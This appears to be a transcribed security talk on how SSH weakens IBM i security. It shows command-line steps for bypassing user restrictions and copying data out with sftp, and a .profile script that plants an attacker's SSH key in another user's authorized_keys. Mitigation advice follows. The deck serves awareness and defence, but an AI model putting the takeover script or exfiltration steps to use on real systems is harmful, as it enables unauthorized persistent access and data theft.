User Home Directory. Hackingiseries.com

Transcription

1 User Home Directory Hackingiseries.com

2 Insecure Shells: The problem with SSH

3 Shalom Carmel is the CTO of GlobalDots.com, a security expert and the author of the Hacking iseries book. He can be contacted at [email protected] Hackingiseries.com

4 You are going to see how SSH deployment on IBM i may cause unexpected, major security risks Hackingiseries.com

5 SSH functionality sftp, scp Secure file transfer ssh - Secure shell (like Telnet) Available on IBM i since 5.3

6 SSH is good SSH is encrypted FTP and TELNET are not Easy to script file transfers SSH can be used to encrypt other cleartext protocols via tunneling De-facto standard in Unix/Linux

7 However SSH deployment on IBM i may cause unexpected major security risks

8 IBM i security methodology Application Security System configuration Limit user Special authorities Limit user capabilities Exit program security System Object security Too often not implemented well.

9 No application security Use the db2 utility to access or modify data $ $ qsh -c 'db2 "select * from NWDB.products"' > products.txt $

10 Some system configuration is irrelevant Session Timeout Limit QSECOFR access 5250 policies irrelevant to SSH Limit virtual devices Password policies Password policies irrelevant to SSH if using private keys

11 A user has limited capabilities in the user profile

12 and cannot run some commands

13 No limit to user capabilities in SSH Use the system utility to run the command that was previously blocked Using username "shalom". password: $ $ system dltf NWDB/items CPC2191: Object ITEMS in NWDB type *FILE deleted.

14 SSH disregards 5250 parms Ignores user level initial program Ignores user level initial menu

15 No exit program security Use external sftp tools to get the data out, either from IFS or from a library psftp> open MyAS400 login as: shalom shalom@myas400's password: Remote working directory is /home/shalom psftp> psftp> get products.txt remote:/home/shalom/products.txt => local:products.txt psftp> psftp> get /qsys.lib/nwdb.lib/prices.file/prices.mbr remote: /qsys.lib/nwdb.lib/prices.file/prices.mbr => local:prices.mbr

16 and while we re at it Let s gather some intelligence for the next phase psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib?rwx qsecofr Mar KOKO.USRPRF?rwx qsecofr Mar MARYLIN.USRPRF?rwx---r-x 1 vndprof Oct 17 14:23 MENNY.USRPRF?rwx qsys Oct 17 16:08 QDBSHR.USRPRF?rwx qsys Oct 17 14:56 QDBSHRDO.USRPRF?rwx qsys Mar QTMPLPD.USRPRF?rwx qsecofr Mar RON.USRPRF?rwx qsecofr Mar ROSY.USRPRF?rwx qsecofr Oct 17 15:45 SHALOM.USRPRF?rwx qsecofr Mar TAMMI.USRPRF?rwx qsecofr Mar TOBIAS.USRPRF psftp>

17 User profiles psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib?rwx qsecofr Mar KOKO.USRPRF?rwx qsecofr Mar MARYLIN.USRPRF?rwx---r-x 1 vndprof Oct 17 14:23 MENNY.USRPRF?rwx qsys Oct 17 16:08 QDBSHR.USRPRF?rwx qsys Oct 17 14:56 QDBSHRDO.USRPRF?rwx qsys Mar QTMPLPD.USRPRF?rwx qsecofr Mar RON.USRPRF?rwx qsecofr Mar ROSY.USRPRF?rwx qsecofr Oct 17 15:45 SHALOM.USRPRF?rwx qsecofr Mar TAMMI.USRPRF?rwx qsecofr Mar TOBIAS.USRPRF psftp>

18 List of libraries Possible targets to explore psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.LIB Listing directory /qsys.lib... drwx qdftown Mar AAETEST2.LIB drwx---rwx 1 qdftown Mar ABCDATAD.LIB drwx---rwx 1 vndprof Mar ABCDATAP.LIB drwx---rwx 1 vndprof Dec 17 14:56 ABCDATAQA.LIB drwx---rwx 1 vndprof Dec 17 16:08 ABCPGMD.LIB drwx---rwx 1 vndprof Mar ABCPGMP.LIB drwx---rwx 1 vndprof Dec 17 14:23 ABCPGMQA.LIB drwx quser Mar ADTSLAB.LIB drwx---rwx 1 benny Mar APBENNY.LIB drwx quser Oct 17 15:45 APSHPY.LIB drwx qdftown Mar AU117FR.LIB... psftp>

19 So far we have seen that SSH Ignores key system values Disregards user limited capabilities Bypasses application security Is not controlled by exit program security

20 IBM i security with SSH System configuration Limit user Special authorities Limit user capabilities Application Security Exit program security System Object security

21 IBM i security with SSH System configuration Limit user Special authorities Limit user capabilities Application Security Exit program security System Object security You are still at risk, because.

22 You are going to see How to take over another user s account via SSH

23 First some explanations about shells and keys Hackingiseries.com

24 A shell is a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel. Wikipedia

25 On IBM i this is a shell The regular AS menu system and command line USER Select one of the following: User Tasks System: MYAS Display or change your job 2. Display messages 3. Send a message 4. Submit a job 5. Work with your spooled output files 6. Work with your batch jobs 7. Display or change your library list 8. Change your password 9. Change your user profile 60. More user task options 90. Sign off Selection or command ===> F3=Exit F4=Prompt F9=Retrieve F12=Cancel F13=Information Assistant F16=System Main menu (C) COPYRIGHT IBM CORP. 1980, 2007.

26 But so is this The QSH command QSH Command Entry Hello SHALOM $ ===> F3=Exit F6=Print F9=Retrieve F12=Disconnect F13=Clear F17=Top F18=Bottom F21=CL command entry

27 And this PASE AIX emulation: CALL QP2TERM /QOpenSys/usr/bin/-sh Hello SHALOM # ===> F3=Exit F6=Print F9=Retrieve F11=Truncate/Wrap F13=Clear F17=Top F18=Bottom F21=CL command entry

28 And also SSH SSH runs in the PASE environment, and behaves like PASE except for different keyboard control

29 Shell mix up The AS400 command line is the primary shell We re good at limiting it, managing access and setting up defaults Very little thought given to proper setup of the other shells

30 SSH private key authentication Enabled by default in the sshd configuration User creates a private/public key pair Public key placed on the server Private key can be protected by a keyphrase, creating a strong, two factor authentication Enterprise SSH key management is difficult

31 Lets get down to business Hackingiseries.com

32 Take over another user via SSH Possible due to the shell mix up on IBM i I am going to associate my own public key with another user The method shown is one of several possible Use your imagination to find other methods After takeover, I can login via SSH as another user, and do stuff as that user Changing the password does not help at all

33 Step 1: Find a user Must have access to the user s home directory Simple because that is the system default Either a user with *ALLOBJ authority Or a user who owns their home directory A user who uses Qshell or PASE but there are workarounds.

34 *ALLOBJ considerations If the perpetrator has *ALLOBJ authority, there are still good reasons for him to be able to masquerade as someone else A perpetrator with *ALLOBJ can setup another user without the elaborate preparations detailed in this presentation

35 Using ssh to find a user In a previous slide you saw how to list QSYS Let s look for a user who has a home dir Using username "badguy". Authenticating with public key "openssh-key" $ cd /home $ ls -l total 136 drwxrws--- 2 badguy Jan 11 09:25 BADGUY drwxrwsrwx 2 goodguy Jan 12 01:45 GOODGUY drwxrwsrwx 3 qibmhelp Apr QIBMHELP drwxrwsrwx 3 qsecofr Jan 11 10:39 QPGMR drwxrwsrwx 2 qsecofr Jan 12 01:57 QSECOFR drwx--s--- 2 user Jan 9 09:39 USER0011 drwx--s--- 3 user Jan 9 09:31 USER0022 $

36 Step 2: Create the homedir The attacked user must already own an existing home directory or have *ALLOBJ authority If the attacked user has *ALLOBJ authority but no home directory, then the following command will create the home directory for the next steps MKDIR DIR('/home/GOODGUY') DTAAUT(*EXCLUDE) OBJAUT(*NONE)

37 Step 3: Modify the shell startup In the home directory, create a file called.profile (with a dot) that does the following: Creates a directory called.ssh Places my public key in file.ssh/authorized_keys Removes all public authority from the home directory, the.ssh directory and authorized_keys Sets ownership of the home directory to self

38 Step 3: Sample.profile script On the echo command below, the red string should be replaced with your public key. The QIBM 5799SS4 SSHD V3.51 string is just for show if [! -d.ssh ] then mkdir.ssh fi chmod 700.ssh if [! -f.ssh/authorized_keys ] then touch.ssh/authorized_keys setccsid 1252.ssh/authorized_keys fi echo ssh-rsa AAAAB3Nza...7/rNy8= QIBM 5799SS4 SSHD V3.51 \ >>.ssh/authorized_keys chmod 700.ssh/authorized_keys chmod 700. rm.profile

39 Step 4: Wait As previously stated, this only works with users who run interactive, non-5250 shell sessions. Typically, these are the power IT users If you have *ALLOBJ authority, you can set up all the necessary files and permissions yourself Or find another creative way to force a user to run some code. Read my book for ideas!

40 Private key authentication highlights Does not care for expired passwords Can log in even if password is *NONE Respects the *DISABLED user status Uses special authorities and object permissions The authorized_keys file can contain multiple public keys

41 Mitigation: Prevention Manage a white list of allowed users and IP addresses in the sshd configuration file Improve the native object security Jail (chroot) your ssh users (good luck with it ) Create a secure home directory for all relevant users Get a good security package with integrated ssh support

42 Mitigation: Audit Have a syslog daemon running and log ssh authentication Audit the /QopenSys/etc/profile and the /etc/profile files Audit the authorized_keys files Get a good security package with auditing and syslog support

43 References Jailing your AS400 users SSH in the Midrange wiki